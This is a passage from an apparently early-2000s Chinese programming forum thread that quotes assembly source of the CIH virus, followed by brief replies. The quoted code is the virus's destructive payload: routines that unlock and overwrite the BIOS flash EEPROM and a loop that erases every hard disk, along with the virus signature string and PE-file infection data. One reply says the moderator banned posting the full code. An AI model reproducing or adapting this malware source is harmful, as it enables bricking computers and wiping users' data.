Kill * ; ************************************** ; *************************** ; * Kill BIOS EEPROM * ; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; *********************** ; * Show BIOS Page in * ; * 000E0000 - 000EFFFF * ; * ( 64 KB ) * ; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; *********************** ; * Show BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** mov di, 0058h dec edx ; and a0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; *********************** ; * Show the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E01FF * ; * ( 512 Bytes ) * ; * , and the Section * ; * of Extra BIOS can * ; * be Writted... * ; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; *********************** ; * Kill the BIOS Extra * ; * ROM Data in Memory * ; * 000E0000 - 000E007F * ; * ( 80h Bytes ) * ; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; *********************** ; * Show and Enable the * ; * BIOS Main ROM Data * ; * 000E0000 - 000FFFFF * ; * ( 128 KB ) * ; * can be Writted... * ; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; *********************** ; * Kill the BIOS Main * ; * ROM Data in Memory * ; * 000FE000 - 000FE07F * ; * ( 80h Bytes ) * ; *********************** mov ah, 0e0h mov [eax], al ; *********************** ; * Hide BIOS Page in * ; * 000F0000 - 000FFFFF * ; * ( 64 KB ) * ; *********************** ; or al 0h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; *************************** ; * Kill All HardDisk * ; *************************************************** ; * IOR Structure of IOS_SendCommand Needs * ; *************************************************** ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; *************************** ; * Enable EEPROM to Write * ; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; *************************** ; * IO for EEPROM * ; *************************** IOForEEPROM: @10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; ********************************************************* ; * Static Data * ; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO ;最后一个调用的VxD的指令的地址 VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath ;各个VxD调用指令地址之差 VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的调用号 VxDCallTableSize = ($-VxDCallIDTable)/04h ;程序中使用VxD调用的个数 ; ********************************************************* ; * Virus Version Copyright * ; ********************************************************* VirusVersionCopyright db \'CIH v\' ;CIH病毒的标识 db MajorVirusVersion+\'0\' ;主版本号 db \'.\' db MinorVirusVersion+\'0\' ;副版本号 db \' TATUNG\' ;作者名字 ; ********************************************************* ; * Virus Size * ; ********************************************************* VirusSize = $ ; + SizeOfVirusCodeSectionTableEndMark(04h) ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) ; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒代码全长 ; ********************************************************* ; * Dynamic Data * ; ********************************************************* VirusGameDataStartAddress = VirusSize @6 = VirusGameDataStartAddress OnBusy db 0 ;忙标志 FileModificationTime dd ? ;文件修改时间 FileNameBuffer db FileNameBufferSize dup(?) ;7fh长的文件名数据区 @7 = FileNameBuffer DataBuffer = $ @8 = DataBuffer NumberOfSections dw ? ; 块数目 TimeDateStamp dd ? ; 文件时间 SymbolsPointer dd ? ; NumberOfSymbols dd ? ; 符号表中符号个数 SizeOfOptionalHeader dw ? ; 可选部首长度 _Characteristics dw ? ; 信息标志 Magic dw ? ; 标志字(总是010bh) LinkerVersion dw ? ; 连接器版本号 SizeOfCode dd ? ; 代码段大小 SizeOfInitializedData dd ? ; 已初始化数据块大小 SizeOfUninitializedData dd ? ; 未初始化数据块大小 AddressOfEntryPoint dd ? ; 程序起始RVA BaseOfCode dd ? ; 代码段起始RVA BaseOfData dd ? ; 数据段起始RVA ImageBase dd ? ; 装入基址RVA @9 = $ SectionAlignment dd ? ; 块对齐 FileAlignment dd ? ; 文件块对齐 OperatingSystemVersion dd ? |
|
|
17楼#
发布于:2002-05-31 19:52
未完不续,站长明令不的传播完整病毒代码。
[编辑 - 5/31/02 by asmsys] |
|
|
18楼#
发布于:2002-06-22 19:35
我听说funlove是用vb编写的.
你这是反汇编的?? |
|
|
19楼#
发布于:2002-06-24 08:48
我听说funlove是用vb编写的. 就是用汇编写的 你看这代码像返汇编的吗??? |
|
|
上一页
下一页